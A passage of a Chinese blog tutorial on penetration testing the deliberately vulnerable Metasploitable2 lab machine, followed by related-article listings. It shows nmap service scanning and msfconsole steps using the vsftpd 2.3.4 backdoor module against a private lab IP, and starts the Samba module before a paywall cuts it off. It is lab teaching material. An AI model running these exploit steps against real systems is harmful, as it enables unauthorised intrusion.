Metasploitable2靶机漏洞渗透测试

原创 已于 2023-03-11 15:59:10 修改 · 2.5k 阅读 · 33 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#学习 #安全 #网络

于 2023-03-11 15:52:47 首次发布
该文详细描述了对Metasploitable靶机的渗透测试过程,包括VSFTPD的笑脸漏洞、Samba服务的漏洞、弱口令服务(如SSH、Telnet、MySQL、PostgreSQL、VNC)的利用,以及JavaRMIServer、NFS、UnrealIRCd、Ingreslock后门和Tomcat管理台弱口令的渗透测试。通过msfconsole等工具,成功获取了靶机的权限。

靶机下载地址:Download Metasploitable - Intentionally Vulnerable Machine | Rapid7

安装方法:下载后直接用vmware打开使用,不需要安装

一、信息收集

扫描靶机开启的服务

nmap -sV 192.168.180.133

这里看到有很多端口和服务,我们一个一个来

二、渗透测试

1、21端口/vsftpd 2.3.4

此版本的vsftpd可能存在笑脸漏洞,我们进行测试

打开msfconsole漏洞测试平台

搜索vsftpd

search vsftpd

使用exploit/unix/ftp/vsftpd_234_backdoor漏洞攻击模块

use 0

查看漏洞需要配置的参数

show options

设置目标IP

set RHOSTS 192.168.180.133

运行

run

成功获取到靶机权限

2、139 | 445 Samba smbd 3.X - 4.X

Samba漏洞影响版本 Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间,条件符合我们进行渗透测试

打开msfconsole漏洞测试平台

搜索samba漏洞攻击模块

search samba

使用此模块

use 8

查看此模块需要配置的参数

show options
</
最低0.47元/天 解锁文章
Attach_1
关注
Metasploitable2靶机渗透linux系统实操
以自己喜欢的方式过一生
11-07 1837
Metasploitable2靶机渗透linux系统实操
metasploitable2 渗透测试靶机 1
m0_73910867的博客
10-11 2103
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 适用于学习网络安全
安全圈最被低估的10个神器:一个比一个强大,大佬都在偷偷用!零基础入门到精通,看这篇就够了!赶紧收藏!
baimao__Ch的博客
02-14 2902
这些冷门的网络安全工具是你工具箱中的强大补充,它们提供了独特的功能,覆盖从侦察到漏洞利用的多个环节。虽然像 Nmap 和 Burp Suite 这样的工具不可或缺,但探索像 CyberChef、BloodHound 和 Impacket 这样的“宝藏工具”能让你在网络安全工作中更加高效和灵活。
渗透测试入门实操:Metasploitable 2 靶机漏洞利用全记录(含 Nmap 多场景扫描对比)
最新发布
xuyuting0322的博客
11-27 655
本文以Metasploitable2靶机为例,系统讲解渗透测试全流程。首先详细拆解Nmap的五大扫描功能(主机扫描、端口扫描、服务识别、系统探测和防火墙绕过),通过多策略对比实现精准信息收集。然后实操三个经典漏洞利用案例:成功利用UnrealIRCd后门漏洞和Druby远程代码执行漏洞获取root权限,并分析PHPCGI参数注入漏洞失败原因。文章强调信息收集与漏洞匹配的关键性,为渗透测试新手提供可直接复现的实践指南。
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
Metasploitable靶机渗透
qq_51926773的博客
11-01 3231
1.导入命令ifconfig得到自己的本机ip(即攻击机) 2.在kali打开nmap,输入自己的本机ip范围,得到在同一局域网的内存活的主机。 3.找到21端口,图片显示ftp。 4.接下来对靶场机器进行探测,我们使用nmap命令 nmap -sV ip/24,得到目标靶机ip 5.然后使用浏览器来浏览http服务的信息,在网址栏输入目标靶机ip 6.得到网页,网页给出信息,登录靶机的账号密码 7.然后输入telnet ip 登录靶机 8.之后再调出控制栏输入msfconsole,连接靶机.
渗透测试实例--Metasploitable2靶机
lxy123_com的博客
02-01 5092
实验环境:Kali Linux虚拟机一台,4G运行,Metasploitable2靶机一台 实验目的: 实验步骤:
Metasploitable2靶机渗透学习
热门推荐
m0_65712192的博客
05-19 1万+
Metasploitable2靶机渗透学习
metasploitable2靶场漏洞总结(部分)
leavrow的博客
08-17 3946
部分metasploitable2渗透靶场漏洞,有很多漏洞都过时了
Metasploitable2靶机渗透
weixin_51167520的博客
03-13 2318
Metasploitable2靶机渗透 实验环境:KALI Metasploitable2 Metasploitable2介绍 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。 进行此次靶机
Metasploitable2靶机渗透笔记
qq_60600840的博客
07-20 1207
metaspolitable靶机安全、渗透、靶机
Metasploitable2中FTP漏洞
m0_56368726的博客
11-04 448
1、查看靶机的ip Metasploitable2默认的用户名是 :msfadmin 密码是: msfadmin 登陆之后使用ip addr查看ip地址 靶机的ip为192.168.43.253
Metasploitable2 漏洞评估(应该没人比我写得更详细更全了)
gh0stf1re的博客
09-17 8241
Metasploitable2 漏洞评估 深感自己基础不扎实,所以打算好好再练一下,就再日一遍Metasploitable2吧 前情提要 靶机Metasploitable2)ip:192.168.206.216 攻击机(kali)ip:192.168.206.128 端口扫描 root@kali:~/Desktop/tools# nmap -sV -p 1-65535 192.168.206.216 扫描结果如下 PORT STATE SERVICE VERSION 21/tcp
Metaspoitable2安全测试靶机の测试心得(上)
web_kids的博客
06-11 1132
无聊写的
Metasploitable2 靶机详细漏洞介绍及通关
vilice的博客
09-06 5904
漏洞产生的原因:在2009年11月到2010年6月间分布于某些镜面站点的UnreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。漏洞产生原因:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。漏洞产生的原因:通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。
看完这篇 教你玩转渗透测试靶机——Metasploitable2
m0_67401746的博客
03-18 8311
Metasploitable2渗透测试详解 Metasploitable2靶机介绍: Metasploitable2靶机下载Metasploitable2靶机安装: Metasploitable2靶机漏洞详解: Metasploitable2靶机渗透总结: Metasploitable2靶机介绍: Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msf
Metasploit 内网渗透二—— 实战渗透操作--感受渗透流程,具体做什么 -永恒之蓝漏洞
天下著书立传者,皆为我师
04-24 3384
渗透测试实战练习1——永恒之蓝漏洞(渗透攻击 Win7 主机并远程执行命令)以及mysql空密码扫描利用(获取mysql数据库中信息)
利用msf 对靶机metasploittable2 进行信息收集
枫梓林のBlog
04-20 1686
利用msf 对靶机metasploittable2 进行信息收集 文章目录利用msf 对靶机metasploittable2 进行信息收集测试环境信息统一收集1.使用netdiscover 扫描存活主机2.使用 Nmap 确认该目标主机3.使用zenmap 扫描开放端口 查找漏洞4.如上图这么多端口开放使用 Nessus 扫描该主机的漏洞一、基于 TCP 协议收集主机信息1.1 ARP 扫描1.2 使用半连接方式扫描TCP端口1.3 使用 auxiliary/sniffer 下的psnuffle 模块进行密
Metasploitable2 靶机漏洞
05-21
Metasploitable2是一款特意设计用于安全培训和漏洞评估的虚拟机,它包含了多个漏洞,可用于测试和学习渗透测试技术。以下是Metasploitable2中包含的一些常见漏洞: 1. Samba漏洞:该漏洞存在于Samba的可共享文件夹中,攻击者可以利用该漏洞执行任意代码并获取系统访问权限。 2. Apache漏洞Metasploitable2中的Apache服务器存在多个漏洞,可用于执行远程代码,包括一个可以导致缓冲区溢出的漏洞。 3. MySQL漏洞Metasploitable2中的MySQL服务器存在可被利用的漏洞,可以导致数据库注入攻击,从而使攻击者能够访问敏感数据。 4. FTP漏洞Metasploitable2中的FTP服务器存在许多漏洞,其中包括一个可以导致拒绝服务攻击的漏洞和一个可以导致远程代码执行的漏洞。 5. SSH漏洞Metasploitable2中的SSH服务器存在一个漏洞,可以导致拒绝服务攻击和远程代码执行。 需要注意的是,Metasploitable2是一个专门设计用于学习和测试渗透测试技术的虚拟机,不应该用于非法用途。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值